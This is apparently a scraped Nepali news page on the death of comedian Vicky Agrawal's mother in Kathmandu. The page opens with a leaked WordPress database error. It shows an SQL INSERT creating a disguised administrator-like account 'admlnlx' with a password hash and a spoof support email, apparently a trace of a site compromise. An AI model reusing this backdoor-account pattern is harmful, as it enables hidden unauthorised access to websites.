WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMn2uM/cEt9El6SsW1vQBiDpBBDorH.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:00:15', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । कमेडी च्याम्पियन २’मा सहभागी भएर दर्शकको मन जितेका कमेडियन विक्की अग्रवाललाई मातृशोक परेको छ ।
उनकी आमा दुर्गा मगरको मंगलबार निधन भएको छ । विक्की र उनकी आमा दुर्गा भाइटीकाको दिन नेपाल आएका थिए । मंगलबार विक्की मिटिङबाट कोठा फर्किदा उनकी आमा अचेत अवस्थामा फेला परेकी थिइन् ।
उनी उच्च रक्तचाप र मधुमेहको बिरामी थिइन् । उनलाई उपचारका लागि चावहिलको मेडिकेयर अस्पताल पुर्याइएको थियो । अस्पताल पुर्याएलगत्तै उनलाई डाक्टरहरुले मृत घोषित गरेको थिए ।
विक्की भारतको सिक्किम निवासी हुन् । यसैले, विक्कीका बुबा र दाजु नेपाल आएर आज बेलुकी ४ बजे दुर्गाको शवलाई सिक्किम लगेको सञ्चारकर्मी तथा ‘कमेडी च्याम्पियन २’का प्रतिस्पर्धी प्रताप लामाले जानकारी दिए ।
‘कमेडी च्याम्पियन २’को फाइनलमा छोराको प्रस्तुति हेर्नका लागि दुर्गा नेपाल आएकी थिइन् ।